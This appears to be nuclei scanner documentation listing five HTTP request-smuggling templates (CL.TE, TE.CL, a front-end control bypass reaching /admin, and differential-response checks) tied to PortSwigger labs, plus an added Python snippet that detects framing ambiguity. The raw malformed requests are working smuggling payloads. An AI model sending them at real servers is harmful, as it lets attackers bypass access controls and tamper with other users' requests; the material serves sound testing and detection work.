Basic CL.TE
This template uses the rawhttp library to send a crafted, malformed HTTP POST request and checks the response for a string match.
id: CL-TE-http-smuggling
info:
  name: HTTP 请求走私,基础 CL.TE 漏洞
  author: pdteam
  severity: info
  reference: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 6
        Transfer-Encoding: chunked

        0

        G
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 6
        Transfer-Encoding: chunked

        0

        G
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Unrecognized method GPOST")'
Basic TE.CL
This template uses the rawhttp library to send a crafted, malformed HTTP POST request and checks the response for a string match.
id: TE-CL-http-smuggling
info:
  name: HTTP 请求走私,基础 TE.CL 漏洞
  author: pdteam
  severity: info
  reference: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-length: 4
        Transfer-Encoding: chunked

        5c
        GPOST / HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 15

        x=1
        0

      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-length: 4
        Transfer-Encoding: chunked

        5c
        GPOST / HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 15

        x=1
        0

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Unrecognized method GPOST")'
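The framing disagreement that the basic CL.TE and TE.CL templates above probe for, shown as an added example that is not part of the nuclei documentation: it frames one raw request by Content-Length and by chunked encoding and reports the bytes each parser would leave on the connection. The function names and the `example.test` host are assumptions; the sample request is rebuilt from the CL.TE template, reduced to its framing headers, with CRLF line endings.

```python
# Added example (not nuclei code). Function names are hypothetical.

def parse_head(raw: bytes):
    """Split the header block from the bytes after it; header names lowercased."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    return headers, rest

def leftover_by_content_length(headers, rest: bytes) -> bytes:
    """Bytes still on the connection after consuming Content-Length bytes."""
    return rest[int(headers[b"content-length"]):]

def leftover_by_chunked(rest: bytes) -> bytes:
    """Bytes still on the connection after consuming a chunked body."""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        # Ignore chunk extensions; a missing size line ends the body.
        size = int(size_line.split(b";")[0] or b"0", 16)
        if size == 0:
            break
        rest = rest[size + 2:]                    # chunk data plus its CRLF
    while rest:                                   # skip trailers up to the blank line
        line, _, rest = rest.partition(b"\r\n")
        if not line:
            break
    return rest

def framing_report(raw: bytes) -> dict:
    """Report whether both framing headers are present and what each leaves over."""
    headers, rest = parse_head(raw)
    has_cl = b"content-length" in headers
    has_te = b"chunked" in headers.get(b"transfer-encoding", b"")
    report = {"ambiguous": has_cl and has_te}
    if has_cl:
        report["left_if_cl"] = leftover_by_content_length(headers, rest)
    if has_te:
        report["left_if_te"] = leftover_by_chunked(rest)
    return report

# Constructed sample: the basic CL.TE request from this page.
CL_TE = (b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 6\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nG")

if __name__ == "__main__":
    print(framing_report(CL_TE))
```

When the two leftovers differ, the front end and the back end disagree about where the request ends; rejecting or normalizing requests that carry both headers at the front end removes that ambiguity.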
Front-end bypass CL.TE
This template uses the rawhttp library to send a crafted, malformed HTTP POST request and checks the response for a string match.
id: smuggling-bypass-front-end-controls-cl-te
info:
  name: HTTP 请求走私绕过前端安全控制,CL.TE 漏洞
  author: pdteam
  severity: info
  reference: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te
http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 116
        Transfer-Encoding: chunked

        0

        GET /admin HTTP/1.1
        Host: localhost
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 10

        x=
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 116
        Transfer-Encoding: chunked

        0

        GET /admin HTTP/1.1
        Host: localhost
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 10

        x=
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/admin/delete?username=carlos")'
CL.TE via differential responses
This template uses the rawhttp library to send a crafted, malformed HTTP POST request and checks the response for a string match.
id: confirming-cl-te-via-differential-responses-http-smuggling
info:
  name: HTTP 请求走私,通过差异响应确认 CL.TE 漏洞
  author: pdteam
  severity: info
  reference: https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-cl-te-via-differential-responses
http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 35
        Transfer-Encoding: chunked

        0

        GET /404 HTTP/1.1
        X-Ignore: X
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 35
        Transfer-Encoding: chunked

        0

        GET /404 HTTP/1.1
        X-Ignore: X
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code==404'
TE.CL via differential responses
This template uses the rawhttp library to send a crafted, malformed HTTP POST request and checks the response for a string match.
id: confirming-te-cl-via-differential-responses-http-smuggling
info:
  name: HTTP 请求走私,通过差异响应确认 TE.CL 漏洞
  author: pdteam
  severity: info
  reference: https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-te-cl-via-differential-responses
http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-length: 4
        Transfer-Encoding: chunked

        5e
        POST /404 HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 15

        x=1
        0

      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-length: 4
        Transfer-Encoding: chunked

        5e
        POST /404 HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 15

        x=1
        0

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code==404'